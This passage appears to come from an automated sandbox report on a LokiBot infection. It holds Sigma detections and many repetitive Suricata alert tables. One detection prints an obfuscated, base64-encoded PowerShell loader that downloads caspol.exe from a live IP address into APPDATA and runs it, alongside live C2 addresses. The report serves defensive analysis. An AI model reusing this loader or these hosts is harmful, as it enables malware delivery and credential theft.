UCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwY

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3756, TargetFilename: C:\Users\user\AppData\Local\Temp\pzazcyvl.apm.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", ProcessId: 3992, ProcessName: csc.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3064, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", ProcessId: 1392, ProcessName: schtasks.exe

Suricata Signatures

ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:20:32.545592+0100	2024197	1	A Network Trojan was detected	192.3.243.136	80	192.168.2.22	49162	TCP
2024-11-21T01:20:37.352153+0100	2024197	1	A Network Trojan was detected	192.3.243.136	80	192.168.2.22	49164	TCP

ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:20:32.545546+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49162	192.3.243.136	80	TCP
2024-11-21T01:20:37.352114+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49164	192.3.243.136	80	TCP
2024-11-21T01:21:08.066236+0100	2024449	1	Attempted User Privilege Gain	192.168.2.22	49171	192.3.243.136	80	TCP

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:02.419043+0100	2024312	1	A Network Trojan was detected	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:05.204233+0100	2024312	1	A Network Trojan was detected	192.168.2.22	49168	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:01.047198+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.518236+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:10.006433+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:11.985823+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.850407+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.628174+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.743709+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:20.049266+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:21.907579+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:23.743037+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:25.486576+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:27.098178+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:29.018877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:30.894519+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:32.726630+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:34.558558+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:36.365955+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:38.140042+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:39.931532+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:41.604608+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:43.448688+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:45.241866+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:47.371970+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:49.207569+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:50.964191+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:52.846976+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:54.717406+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:56.499939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:58.317709+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:22:00.072516+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:01.774545+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:03.913790+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:05.709669+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:07.446181+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:09.167577+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:10.840995+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:13.264617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:15.051076+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:07.241320+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49172	TCP
2024-11-21T01:21:09.369304+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49173	TCP
2024-11-21T01:21:11.534454+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49174	TCP
2024-11-21T01:21:13.501726+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49175	TCP
2024-11-21T01:21:15.363233+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49176	TCP
2024-11-21T01:21:17.202425+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49177	TCP
2024-11-21T01:21:19.346509+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49178	TCP
2024-11-21T01:21:21.623707+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49179	TCP
2024-11-21T01:21:23.485202+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49180	TCP
2024-11-21T01:21:25.238192+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49181	TCP
2024-11-21T01:21:26.838662+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49182	TCP
2024-11-21T01:21:28.679061+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49183	TCP
2024-11-21T01:21:30.554763+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49184	TCP
2024-11-21T01:21:32.450257+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49185	TCP
2024-11-21T01:21:34.300885+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49186	TCP
2024-11-21T01:21:36.098263+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49187	TCP
2024-11-21T01:21:37.869361+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49188	TCP
2024-11-21T01:21:39.666300+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49189	TCP
2024-11-21T01:21:41.345210+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49190	TCP
2024-11-21T01:21:43.192055+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49191	TCP
2024-11-21T01:21:44.983412+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49192	TCP
2024-11-21T01:21:46.907622+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49193	TCP
2024-11-21T01:21:48.937477+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49194	TCP
2024-11-21T01:21:50.707604+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49195	TCP
2024-11-21T01:21:52.577552+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49196	TCP
2024-11-21T01:21:54.445447+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49197	TCP
2024-11-21T01:21:56.247574+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49198	TCP
2024-11-21T01:21:58.050796+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49199	TCP
2024-11-21T01:21:59.823479+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49200	TCP
2024-11-21T01:22:01.492128+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49201	TCP
2024-11-21T01:22:03.292326+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49202	TCP
2024-11-21T01:22:05.435922+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49203	TCP
2024-11-21T01:22:07.165912+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49204	TCP
2024-11-21T01:22:08.852321+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49205	TCP
2024-11-21T01:22:10.578296+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49206	TCP
2024-11-21T01:22:12.433493+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49207	TCP
2024-11-21T01:22:14.793565+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49208	TCP
2024-11-21T01:22:16.639211+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.22	49209	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:07.116232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:09.249159+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:11.401975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:13.382068+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:15.243442+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:17.082377+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:19.199416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:21.472227+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:23.365586+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:25.118419+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:26.719111+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:28.558962+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:30.435077+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:32.330517+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:34.180186+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:35.978469+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:37.749718+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:39.546512+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:41.225623+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:43.072411+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:44.863575+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:46.669234+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:48.817665+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:50.587584+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:52.457887+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:54.325719+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:56.127939+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:57.929942+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:59.701729+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:22:01.372457+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:03.169788+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:05.316294+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:07.046260+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:08.721115+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:10.458606+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:12.256004+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:14.673611+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:16.519414+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:07.116232+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:09.249159+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:11.401975+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:13.382068+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:15.243442+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:17.082377+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:19.199416+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-21T01:21:21.472227+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-21T01:21:23.365586+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-21T01:21:25.118419+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-21T01:21:26.719111+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-21T01:21:28.558962+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-21T01:21:30.435077+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-21T01:21:32.330517+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49185	94.156.177.41	80	TCP
2024-11-21T01:21:34.180186+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49186	94.156.177.41	80	TCP
2024-11-21T01:21:35.978469+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49187	94.156.177.41	80	TCP
2024-11-21T01:21:37.749718+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49188	94.156.177.41	80	TCP
2024-11-21T01:21:39.546512+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49189	94.156.177.41	80	TCP
2024-11-21T01:21:41.225623+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49190	94.156.177.41	80	TCP
2024-11-21T01:21:43.072411+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49191	94.156.177.41	80	TCP
2024-11-21T01:21:44.863575+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49192	94.156.177.41	80	TCP
2024-11-21T01:21:46.669234+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49193	94.156.177.41	80	TCP
2024-11-21T01:21:48.817665+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49194	94.156.177.41	80	TCP
2024-11-21T01:21:50.587584+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49195	94.156.177.41	80	TCP
2024-11-21T01:21:52.457887+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49196	94.156.177.41	80	TCP
2024-11-21T01:21:54.325719+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49197	94.156.177.41	80	TCP
2024-11-21T01:21:56.127939+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49198	94.156.177.41	80	TCP
2024-11-21T01:21:57.929942+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49199	94.156.177.41	80	TCP
2024-11-21T01:21:59.701729+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49200	94.156.177.41	80	TCP
2024-11-21T01:22:01.372457+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49201	94.156.177.41	80	TCP
2024-11-21T01:22:03.169788+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49202	94.156.177.41	80	TCP
2024-11-21T01:22:05.316294+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49203	94.156.177.41	80	TCP
2024-11-21T01:22:07.046260+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49204	94.156.177.41	80	TCP
2024-11-21T01:22:08.721115+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49205	94.156.177.41	80	TCP
2024-11-21T01:22:10.458606+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49206	94.156.177.41	80	TCP
2024-11-21T01:22:12.256004+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49207	94.156.177.41	80	TCP
2024-11-21T01:22:14.673611+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49208	94.156.177.41	80	TCP
2024-11-21T01:22:16.519414+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.22	49209	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T01:21:01.047198+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49167	94.156.177.41	80	TCP
2024-11-21T01:21:03.800167+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49168	94.156.177.41	80	TCP
2024-11-21T01:21:05.691982+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-21T01:21:07.518236+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-21T01:21:10.006433+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-21T01:21:11.985823+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-21T01:21:13.850407+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-21T01:21:15.628174+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-21T01:21:17.743709+0100	2021641	1	A Network Trojan was detected	192.168.2.22	49178	94.156.177.41	80	TCP
